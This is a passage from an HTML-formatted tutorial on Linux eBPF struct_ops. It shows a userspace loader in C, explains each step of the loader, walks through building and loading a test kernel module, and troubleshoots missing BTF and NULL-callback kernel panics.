&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;struct_ops_bpf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_link&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SIGINT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;handle_signal&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SIGTERM&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;handle_signal&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Open BPF application */&lt;/span&gt;
    &lt;span class="n"&gt;skel&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;struct_ops_bpf__open&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to open BPF skeleton&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Load BPF programs */&lt;/span&gt;
    &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;struct_ops_bpf__load&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to load BPF skeleton: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Register struct_ops */&lt;/span&gt;
    &lt;span class="n"&gt;link&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map__attach_struct_ops&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;maps&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;testmod_ops&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to attach struct_ops&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Successfully loaded and attached BPF struct_ops!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Triggering struct_ops callbacks...&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Trigger the struct_ops by writing to proc file */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;trigger_struct_ops&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Hello from userspace!"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Failed to trigger struct_ops - is the kernel module loaded?&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Load it with: sudo insmod module/hello.ko&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Triggered struct_ops successfully! Check dmesg for output.&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Press Ctrl-C to exit...&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Main loop - trigger periodically */&lt;/span&gt;
    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;exiting&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;sleep&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;exiting&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;trigger_struct_ops&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Periodic trigger"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Triggered struct_ops again...&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Detaching struct_ops...&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_link__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="nl"&gt;cleanup:&lt;/span&gt;
    &lt;span class="n"&gt;struct_ops_bpf__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the Userspace Code
&lt;/h3&gt;

&lt;p&gt;The userspace code orchestrates the entire process.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Signal Handling&lt;/strong&gt;: It sets up a signal handler for &lt;code&gt;SIGINT&lt;/code&gt; and &lt;code&gt;SIGTERM&lt;/code&gt; to allow for a graceful exit. This is crucial for &lt;code&gt;struct_ops&lt;/code&gt; because we need to ensure the BPF program is detached properly.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Open and Load&lt;/strong&gt;: It uses the standard &lt;code&gt;libbpf&lt;/code&gt; skeleton API to open and load the BPF application (&lt;code&gt;struct_ops_bpf__open()&lt;/code&gt; and &lt;code&gt;struct_ops_bpf__load()&lt;/code&gt;). This loads the BPF programs and the &lt;code&gt;struct_ops&lt;/code&gt; map into the kernel.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Attach &lt;code&gt;struct_ops&lt;/code&gt;&lt;/strong&gt;: The key step is the attachment:&lt;br&gt;
&lt;/p&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;link&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map__attach_struct_ops&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;maps&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;testmod_ops&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;This &lt;code&gt;libbpf&lt;/code&gt; function does the heavy lifting. It takes the &lt;code&gt;struct_ops&lt;/code&gt; map from our BPF skeleton (&lt;code&gt;skel-&amp;gt;maps.testmod_ops&lt;/code&gt;) and asks the kernel to link it to the corresponding &lt;code&gt;struct_ops&lt;/code&gt; definition (which it finds by the name "bpf_testmod_ops"). If successful, the kernel's &lt;code&gt;reg&lt;/code&gt; callback in our module is executed, and the function pointers in the kernel are now pointing to our BPF programs. The function returns a &lt;code&gt;bpf_link&lt;/code&gt;, which represents the active attachment.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Triggering&lt;/strong&gt;: The &lt;code&gt;trigger_struct_ops&lt;/code&gt; function simply opens the &lt;code&gt;/proc/bpf_testmod_trigger&lt;/code&gt; file and writes a message to it. This action invokes the &lt;code&gt;trigger_write&lt;/code&gt; handler in our kernel module, which in turn calls the BPF-implemented operations.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Cleanup&lt;/strong&gt;: When the user presses Ctrl-C, the &lt;code&gt;exiting&lt;/code&gt; flag is set, the loop terminates, and &lt;code&gt;bpf_link__destroy(link)&lt;/code&gt; is called. This is the counterpart to the attach step. It detaches the BPF programs, causing the kernel to call the &lt;code&gt;unreg&lt;/code&gt; callback in our module. This cleans up the link and decrements the module's reference count, allowing it to be unloaded cleanly. If this step is skipped (e.g., by killing the process with &lt;code&gt;-9&lt;/code&gt;), the module will remain "in use" until the kernel's garbage collection cleans up the link, which can take time.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Now that we have all three components—the kernel module, the BPF program, and the userspace loader—let's compile and run the example to see &lt;code&gt;struct_ops&lt;/code&gt; in action.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Build the Kernel Module
&lt;/h3&gt;

&lt;p&gt;First, navigate to the &lt;code&gt;module&lt;/code&gt; directory and compile the kernel module. This requires having the kernel headers installed for your current kernel version.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;module
make
&lt;span class="nb"&gt;cd&lt;/span&gt; ..
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This will produce a &lt;code&gt;hello.ko&lt;/code&gt; file, which is our compiled kernel module.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Load the Kernel Module
&lt;/h3&gt;

&lt;p&gt;Load the module into the kernel using &lt;code&gt;insmod&lt;/code&gt;. This will register our &lt;code&gt;bpf_testmod_ops&lt;/code&gt; struct_ops type and create the &lt;code&gt;/proc/bpf_testmod_trigger&lt;/code&gt; file.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;insmod module/hello.ko
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can verify that the module loaded successfully by checking the kernel log:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;dmesg | &lt;span class="nb"&gt;tail&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should see a message like: &lt;code&gt;bpf_testmod loaded with struct_ops support&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Build and Run the eBPF Application
&lt;/h3&gt;

&lt;p&gt;Next, compile and run the userspace loader, which will also compile the BPF program.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;make
&lt;span class="nb"&gt;sudo&lt;/span&gt; ./struct_ops
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Upon running, the userspace application will:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; Load the BPF programs.&lt;/li&gt;
&lt;li&gt; Attach the BPF implementation to the &lt;code&gt;bpf_testmod_ops&lt;/code&gt; struct_ops.&lt;/li&gt;
&lt;li&gt; Write to &lt;code&gt;/proc/bpf_testmod_trigger&lt;/code&gt; to invoke the BPF functions.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;You should see output in your terminal like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Successfully loaded and attached BPF struct_ops!
Triggering struct_ops callbacks...
Triggered struct_ops successfully! Check dmesg for output.

Press Ctrl-C to exit...
Triggered struct_ops again...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4. Check the Kernel Log for BPF Output
&lt;/h3&gt;

&lt;p&gt;While the userspace program is running, open another terminal and watch the kernel log to see the output from our BPF programs.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;dmesg &lt;span class="nt"&gt;-w&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every time the proc file is written to, you will see messages printed by the BPF programs via &lt;code&gt;bpf_printk&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[ ... ] bpf_testmod_ops registered
[ ... ] Calling struct_ops callbacks:
[ ... ] BPF test_1 called!
[ ... ] test_1() returned: 42
[ ... ] BPF test_2 called: 10 + 20 = 30
[ ... ] test_2(10, 20) returned: 30
[ ... ] BPF test_3 called with buffer length 21
[ ... ] Buffer content: 'Hell'
[ ... ] Full buffer: Hello from userspace!
[ ... ] test_3() called with buffer
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This output confirms that the calls from the kernel module are being correctly dispatched to our BPF programs.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Clean Up
&lt;/h3&gt;

&lt;p&gt;When you are finished, press &lt;code&gt;Ctrl-C&lt;/code&gt; in the terminal running &lt;code&gt;./struct_ops&lt;/code&gt;. The program will gracefully detach the BPF link. Then, you can unload the kernel module.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;rmmod hello
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Finally, clean up the build artifacts:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;make clean
&lt;span class="nb"&gt;cd &lt;/span&gt;module
make clean
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Note on Unloading the Module&lt;/strong&gt;: Gracefully stopping the userspace program is important. It ensures &lt;code&gt;bpf_link__destroy()&lt;/code&gt; is called, which allows the kernel module's reference count to be decremented. If the userspace process is killed abruptly (e.g., with &lt;code&gt;kill -9&lt;/code&gt;), the kernel module may remain "in use," and &lt;code&gt;rmmod&lt;/code&gt; will fail until the BPF link is garbage collected by the kernel, which can take some time.&lt;/p&gt;

&lt;h2&gt;
  
  
  Troubleshooting Common Issues
&lt;/h2&gt;

&lt;p&gt;When working with advanced features like &lt;code&gt;struct_ops&lt;/code&gt;, which involve kernel modules, BTF, and the BPF verifier, you may encounter some tricky issues. This section covers common problems and their solutions, based on the development process of this example.&lt;/p&gt;

&lt;h3&gt;
  
  
  Issue 1: Failed to find BTF for &lt;code&gt;struct_ops&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Symptom:&lt;/strong&gt; The userspace loader fails with an error like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;libbpf: failed to find BTF info for struct_ops/bpf_testmod_ops
Failed to attach struct_ops
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Root Cause:&lt;/strong&gt; This error means the kernel module (&lt;code&gt;hello.ko&lt;/code&gt;) was compiled without the necessary BTF (BPF Type Format) information. The BPF system relies on BTF to understand the structure and types defined in the module, which is essential for linking the BPF program to the &lt;code&gt;struct_ops&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Ensure &lt;code&gt;vmlinux&lt;/code&gt; with BTF is available:&lt;/strong&gt; The kernel build system needs access to the &lt;code&gt;vmlinux&lt;/code&gt; file corresponding to your running kernel to generate BTF for external modules. This file is often not available by default. You may need to copy it from &lt;code&gt;/sys/kernel/btf/vmlinux&lt;/code&gt; or build it from your kernel source. A common location for the build system to look is &lt;code&gt;/lib/modules/$(uname -r)/build/vmlinux&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Ensure &lt;code&gt;pahole&lt;/code&gt; is up-to-date:&lt;/strong&gt; BTF generation depends on the &lt;code&gt;pahole&lt;/code&gt; tool (part of the &lt;code&gt;dwarves&lt;/code&gt; package). Older versions of &lt;code&gt;pahole&lt;/code&gt; may lack the features needed for modern BTF generation. Ensure you have &lt;code&gt;pahole&lt;/code&gt; v1.16 or newer. If your distribution's version is too old, you may need to compile it from source.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Rebuild the module:&lt;/strong&gt; After ensuring the dependencies are met, rebuild the kernel module. The &lt;code&gt;Makefile&lt;/code&gt; for this example already includes the &lt;code&gt;-g&lt;/code&gt; flag, which instructs the compiler to generate debug information that &lt;code&gt;pahole&lt;/code&gt; uses to create BTF.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;You can verify that BTF information is present in your module with &lt;code&gt;readelf&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;readelf &lt;span class="nt"&gt;-S&lt;/span&gt; module/hello.ko | &lt;span class="nb"&gt;grep&lt;/span&gt; .BTF
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should see sections named &lt;code&gt;.BTF&lt;/code&gt; and &lt;code&gt;.BTF.ext&lt;/code&gt;, indicating that BTF data has been embedded.&lt;/p&gt;

&lt;h3&gt;
  
  
  Issue 2: Kernel Panic on Module Load
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Symptom:&lt;/strong&gt; The system crashes (kernel panic) immediately after you run &lt;code&gt;sudo insmod hello.ko&lt;/code&gt;. The &lt;code&gt;dmesg&lt;/code&gt; log might show a &lt;code&gt;NULL pointer dereference&lt;/code&gt; inside &lt;code&gt;register_bpf_struct_ops&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Root Cause:&lt;/strong&gt; The kernel's &lt;code&gt;struct_ops&lt;/code&gt; registration logic expects certain callback pointers in the &lt;code&gt;bpf_struct_ops&lt;/code&gt; structure to be non-NULL. In older kernel versions or certain configurations, if callbacks like &lt;code&gt;.verifier_ops&lt;/code&gt;, &lt;code&gt;.init&lt;/code&gt;, or &lt;code&gt;.init_member&lt;/code&gt; are missing, the kernel may dereference a NULL pointer, causing a panic. The kernel's code doesn't always perform defensive NULL checks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; Always provide all required callbacks in your &lt;code&gt;bpf_struct_ops&lt;/code&gt; definition, even if they are just empty functions.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// In module/hello.c&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_verifier_ops&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_verifier_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;is_valid_access&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_is_valid_access&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get_func_proto&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_get_func_proto&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_struct_ops&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_struct_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;verifier_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_verifier_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// REQUIRED&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;init&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_init&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;              &lt;span class="c1"&gt;// REQUIRED&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;init_member&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_init_member&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// REQUIRED&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;reg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_reg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;unreg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_unreg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="cm"&gt;/* ... */&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;By explicitly defining these callbacks, you prevent the kernel from attempting to call a NULL function pointer.&lt;/p&gt;

&lt;h3&gt;
  
  
  Issue 3: BPF Program Fails to Load with "Invalid Argument"
&lt;/h3&gt;

